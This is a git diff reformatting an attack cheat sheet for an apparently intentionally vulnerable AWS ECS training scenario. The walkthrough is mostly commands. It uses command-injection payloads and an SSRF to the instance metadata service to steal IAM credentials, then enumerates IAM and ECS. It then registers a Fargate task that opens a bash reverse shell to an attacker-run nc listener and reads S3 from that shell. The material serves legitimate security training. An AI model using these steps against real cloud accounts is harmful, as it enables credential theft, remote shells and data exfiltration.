diff --git a/scenarios/ecs_privesc_evade_protection/cheat_sheet.md b/scenarios/ecs_privesc_evade_protection/cheat_sheet.md index fd7365e6..d3648e9a 100644 --- a/scenarios/ecs_privesc_evade_protection/cheat_sheet.md +++ b/scenarios/ecs_privesc_evade_protection/cheat_sheet.md @@ -4,7 +4,8 @@ Go to `http://` ### Command Injection -``` +```bash +# Command Injection on web. ; aws s3 ls ; aws s3 ls s3:/// ; aws s3 cp s3:///flag.txt . @@ -12,7 +13,8 @@ Go to `http://` ``` ### SSRF -``` + +```bash # SSRF Attack. http:///?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ @@ -34,11 +36,13 @@ Go to `http://` ### SSRF -``` -http:///?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ -aws configure --profile attacker -echo "aws_session_token = " >> ~/.aws/credentials -``` +* Using IPv6 to SSRF on web with `http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/` +* Get credentials & using it to your CLI profile. + + ```bash + aws configure --profile attacker + echo "aws_session_token = " >> ~/.aws/credentials + ``` ### Command Injection @@ -47,49 +51,96 @@ echo "aws_session_token = " >> ~/.aws/credentials ### For more information -- more information about iam +- more information about iam. -``` -aws sts get-caller-identity -aws iam get-role --role-name -aws iam list-attached-role-policies --role-name -aws iam list-role-policies --role-name -aws iam get-role-policy --role-name --policy-name -aws iam list-roles -``` + ```bash + aws sts get-caller-identity + aws iam list-roles + aws iam get-role --role-name + aws iam list-attached-role-policies --role-name + aws iam list-role-policies --role-name + aws iam get-role-policy --role-name --policy-name + ```` -- more information about ecs +- more information about ecs clusters. -``` -aws ecs list-clusters --region -aws ecs describe-clusters --region --clusters -aws ecs list-container-instances --region --cluster -``` - -### ECS Privesc - -* Attacker prepare revshell at other public ip point with `nc -lvp 4000`. + ```bash + aws ecs list-clusters --region + aws ecs describe-clusters --region --clusters + aws ecs list-container-instances --region --cluster + ``` +- find available vpc subnets. -* And now come back to CLI. + ```bash + aws ec2 describe-subnets --region + ``` -``` -# ECS Task definition with revshell command. -aws ecs register-task-definition --region --family --task-role-arn --network-mode "awsvpc" --cpu 256 --memory 512 --requires-compatibilities "[\"FARGATE\"]" --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp// 0>&1\\\"\"]}]" +### ECS Privesc -# For run-task, find available subnets. -aws ec2 describe-subnets --region - -# Run task. -aws ecs run-task --region --task-definition --cluster --launch-type FARGATE --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"\"]}}" -``` -After a few minutes, the revshell will be connected by container. -Let's do it on revshell. +1. Attacker prepare revshell at other public ip point with `nc -lvp 4000`. + +2. And now come back to CLI. + +3. Create an ECS Task Definition JSON File: + + Create a file named task-definition.json and include the following content. + Replace ``, ``, ``, ``, and `` with your actual values. + + ```json + { + "family": "", + "taskRoleArn": "", + "networkMode": "awsvpc", + "cpu": "256", + "memory": "512", + "requiresCompatibilities": ["FARGATE"], + "containerDefinitions": [ + { + "name": "exfil_creds", + "image": "python:latest", + "entryPoint": ["sh", "-c"], + "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp// 0>&1\\\""] + } + ] + } + ``` + +4. Create an ECS Run Task JSON File. + + Create a file named run-task.json and include the following content. Replace `` with the actual values for your setup. + + ```json + { + "launchType": "FARGATE", + "networkConfiguration": { + "awsvpcConfiguration": { + "assignPublicIp": "ENABLED", + "subnets": [""] + } + } + } + ``` + +5. Register Task Definition and Run Task + + Now, you can use the AWS CLI with the JSON files to execute the commands. + + ```bash + # Register task definition + aws ecs register-task-definition --region --cli-input-json file://task-definition.json + + # Run task + aws ecs run-task --region --task-definition --cluster --cli-input-json file://run-task.json + ``` + + After a few minutes, the revshell will be connected by container. + Let's access to s3 on revshell. ### Access S3 -``` -apt-get update -apt-get install awscli +```bash +apt update +apt install awscli aws s3 ls aws s3 ls s3:///